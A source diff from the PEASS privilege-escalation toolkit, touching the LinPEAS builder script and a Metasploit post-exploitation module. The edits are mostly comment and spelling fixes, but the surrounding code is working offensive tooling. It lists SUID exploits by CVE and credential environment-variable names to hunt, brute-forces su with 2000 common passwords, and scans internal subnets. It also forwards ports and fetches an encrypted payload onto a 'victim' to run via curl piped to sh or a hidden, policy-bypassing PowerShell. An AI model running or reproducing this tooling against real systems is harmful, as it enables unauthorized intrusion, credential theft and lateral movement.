@ -392,7 +392,7 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
/xscreensaver%Solaris_11.x\(CVE-2019-3010\)\
/xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
/xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
# To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
sidVB='peass{SUIDVB1_HERE}'
sidVB2='peass{SUIDVB2_HERE}'
cfuncs='file|free|main|more|read|split|write'
@ -428,7 +428,7 @@ for P in $ADDPATH; do
if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi
done
# test if sed supports -E or -r
# Test if sed supports -E or -r
E=E
echo | sed -${E} 's/o/a/' 2>/dev/null
if [ $? -ne 0 ] ; then
@ -460,13 +460,13 @@ if ! [ "$USER" ]; then
USER=$(whoami 2>/dev/null || echo -n "UserUnknown")
fi
if [ ! "$HOME" ]; then
if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home
if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; # Mac home
else HOME="/home/$USER";
fi
fi
Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|')
#This variables are dived in several different ones because NetBSD required it
# These variables are divided into several different ones because NetBSD requires that.
peass{VARIABLES}
pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID"
pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID"
@ -489,9 +489,9 @@ katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat
charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \
andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \
plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude"
PASSTRY="2000" #Default num of passwds to try (all by default)
PASSTRY="2000" # Default num of passwds to try (all by default)
if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this
if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi # If Network reduce the time on this
SEDOVERFLOW=true
for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do
wgroups="$wgroups -group $grp -or "
@ -513,9 +513,9 @@ while $SEDOVERFLOW; do
if [ $? -eq 0 ]; then
SEDOVERFLOW=false
else
MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1
MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) # If overflow of directories, check again with MAXPATH_FIND_W - 1
fi
if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop
if [ $MAXPATH_FIND_W -lt 1 ] ; then # Prevents infinite loop
SEDOVERFLOW=false
fi
done
@ -691,20 +691,20 @@ print_2title(){
START_T2_TIME=$(date +%s 2>/dev/null)
fi
printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═"
printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC # There are 10 "═"
}
print_3title(){
printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═"
printf ${BLUE}"══╣ $GREEN$1\n"$NC # There are 2 "═"
}
print_3title_no_nl(){
printf "\033[2K\r"
printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═"
printf ${BLUE}"══╣ $GREEN${1}..."$NC # There are 2 "═"
}
print_list(){
printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═"
printf ${BLUE}"═╣ $GREEN$1"$NC # There is 1 "═"
}
print_info(){
@ -713,7 +713,7 @@ print_info(){
print_ps (){
(ls -d /proc/*/ 2>/dev/null | while read f; do
CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess
CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); # Delete my own sed processess
if [ "$CMDLINE" ];
then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3);
printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE";
@ -733,14 +733,14 @@ su_try_pwd (){
su_brute_user_num (){
BFUSER=$1
TRIES=$2
su_try_pwd "$BFUSER" "" & #Try without password
su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password
su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password
su_try_pwd "$BFUSER" "" & # Try without password
su_try_pwd "$BFUSER" "$BFUSER" & # Try username as password
su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & # Try reverse username as password
if [ "$PASSWORD" ]; then
su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password
su_try_pwd "$BFUSER" "$PASSWORD" & # Try given password
fi
for i in $(seq "$TRIES"); do
su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000)
su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & # Try TOP TRIES of passwords (by default 2000)
sleep 0.007 # To not overload the system
done
wait
@ -796,8 +796,8 @@ check_tcp_443(){
check_icmp(){
(timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available"
}
#DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
#I cannot use this function because timeout doesn't find it, so it's copy/pasted below
# DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
# I cannot use this function because timeout doesn't find it, so it's copy/pasted below
check_dns(){
(timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available"
}
@ -814,7 +814,7 @@ basic_net_info(){
}
select_nc (){
#Select the correct configuration of the netcat found
# Select the correct configuration of the netcat found
NC_SCAN="$FOUND_NC -v -n -z -w 1"
$($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
if [ $? -eq 2 ]
@ -824,7 +824,7 @@ select_nc (){
}
icmp_recon (){
#Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
# Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
IP3=$(echo $1 | cut -d "." -f 1,2,3)
(timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
@ -837,7 +837,7 @@ icmp_recon (){
}
tcp_recon (){
#Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
# Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
IP3=$(echo $1 | cut -d "." -f 1,2,3)
PORTS=$2
printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
@ -857,7 +857,7 @@ tcp_recon (){
}
tcp_port_scan (){
#Scan open ports of a host. Default: nmap top 1000, but the user can select others
# Scan open ports of a host. Default: nmap top 1000, but the user can select others
basic_net_info
print_title "Network Port Scanning"
@ -885,7 +885,7 @@ tcp_port_scan (){
}
discover_network (){
#Check if IP and Netmask are correct and the use fping or ping to find hosts
# Check if IP and Netmask are correct and the use fping or ping to find hosts
basic_net_info
print_title "Network Discovery"
@ -900,11 +900,11 @@ discover_network (){
exit 0
fi
#Using fping if possible
# Using fping if possible
if [ "$FPING" ]; then
$FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED},"
#Loop using ping
# Loop using ping
else
if [ "$NETMASK" -eq "24" ]; then
printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC"
@ -927,7 +927,7 @@ discover_network (){
discovery_port_scan (){
basic_net_info
#Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
# Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
print_title "Internal Network Discovery - Finding hosts and scanning ports"
DISCOVERY=$1
MYPORTS=$2
@ -946,7 +946,7 @@ discovery_port_scan (){
fi
PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')"
PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions
PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) # Delete repetitions
if [ "$NETMASK" -eq "24" ]; then
printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC
@ -1040,7 +1040,7 @@ if [ "$PORTS" ]; then
printf ${BLUE}"$HELP"$NC;
exit 0
else
#Select the correct configuration of the netcat found
# Select the correct configuration of the netcat found
select_nc
fi
else
@ -1084,12 +1084,12 @@ if [ "$PORT_FORWARD" ]; then
exit 0
fi
#Check if LOCAL_PORT is a number
# Check if LOCAL_PORT is a number
if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
fi
#Check if REMOTE_PORT is a number
# Check if REMOTE_PORT is a number
if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
fi
@ -1099,7 +1099,7 @@ if [ "$PORT_FORWARD" ]; then
fi
#Get HOMESEARCH
# Get HOMESEARCH
if [ "$SEARCH_IN_FOLDER" ]; then
HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/"
else
@ -1139,7 +1139,7 @@ elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | g
fi
if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
#GENERATE THE STORAGES OF THE FOUND FILES
# GENERATE THE STORAGES OF THE FOUND FILES
peass{STORAGES_HERE}
##### POST SEARCH VARIABLES #####


@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post
'Name' => 'Multi PEASS launcher',
'Description' => %q{
This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows.
By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
},
@ -52,18 +52,18 @@ class MetasploitModule < Msf::Post
end
def run
ps_var1 = rand(36**5).to_s(36) #Winpeas PS needed variable
ps_var1 = rand(36**5).to_s(36) # Winpeas PS needed variable
# Load PEASS script in memory
peass_script = load_peass()
print_good("PEASS script successfully retreived.")
print_good("PEASS script successfully retrieved.")
# Obfuscate loaded PEASS script
if datastore["PASSWORD"].length > 1
# If no Windows, check if openssl exists
if !session.platform.include?("win")
openssl_path = cmd_exec("command -v openssl")
raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl")
end
# Get encrypted PEASS script in B64
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Post
# As the PS function is only capable of decrypting readable strings
# in Windows we encrypt the B64 of the binary and then load it in memory
# from the initial B64. Then: original -> B64 -> encrypt -> B64
aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) #Base64 before encrypting it
aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) # Base64 before encrypting it
peass_script_64 = aes_enc_peass_ret["encrypted"]
key_b64 = aes_enc_peass_ret["key_b64"]
iv_b64 = aes_enc_peass_ret["iv_b64"]
@ -97,7 +97,7 @@ class MetasploitModule < Msf::Post
# If no Windows, check if base64 exists
if !session.platform.include?("win")
base64_path = cmd_exec("command -v base64")
raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64")
end
# Encode PEASS script
@ -137,7 +137,7 @@ class MetasploitModule < Msf::Post
upload_file(temp_path, file.path)
print_good("Uploaded")
#Start the cmd, prepare to read from the uploaded file
# Start the cmd, prepare to read from the uploaded file
if session.platform.include?("win")
cmd = "$ProgressPreference = 'SilentlyContinue'; $#{ps_var1} = Get-Content -Path #{temp_path};"
last_cmd = "del #{temp_path};"
@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
last_cmd = " ; rm #{temp_path}"
end
# Instead of writting the file to disk, download it from HTTP
# Instead of writing the file to disk, download it from HTTP
else
last_cmd = ""
# Start HTTP server
@ -159,13 +159,13 @@ class MetasploitModule < Msf::Post
url_download_peass = http_protocol + http_ip + http_port + http_path
print_good("Listening in #{url_download_peass}")
# Configure the download of the scrip in Windows
# Configure the download of the script in Windows
if session.platform.include?("win")
cmd = "$ProgressPreference = 'SilentlyContinue';"
cmd += get_bypass_tls_cert()
cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
# Configure the download of the scrip in unix
# Configure the download of the script in Unix
else
cmd = "curl -k -s \"#{url_download_peass}\""
curl_path = cmd_exec("command -v curl")
@ -193,7 +193,7 @@ class MetasploitModule < Msf::Post
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
# If unix, then, suppose linpeas was loaded
# If Unix, then, suppose linpeas was loaded
else
cmd += "| #{decode_linpeass_cmd}"
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
@ -259,7 +259,7 @@ class MetasploitModule < Msf::Post
end
def aes_enc_peass(peass_script)
# Encrypt the PEASS script with aes
# Encrypt the PEASS script with AES (CBC Mode)
key = datastore["PASSWORD"]
iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv
@ -333,7 +333,7 @@ function DecryptStringFromBytesAes([String] $key, [String] $iv, [String] $encryp
$csDecrypt = new-object System.Security.Cryptography.CryptoStream($msDecrypt, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
$srDecrypt = new-object System.IO.StreamReader($csDecrypt)
#Write all data to the stream.
# Write all data to the stream.
$plainText = $srDecrypt.ReadToEnd()
$srDecrypt.Close()
$csDecrypt.Close()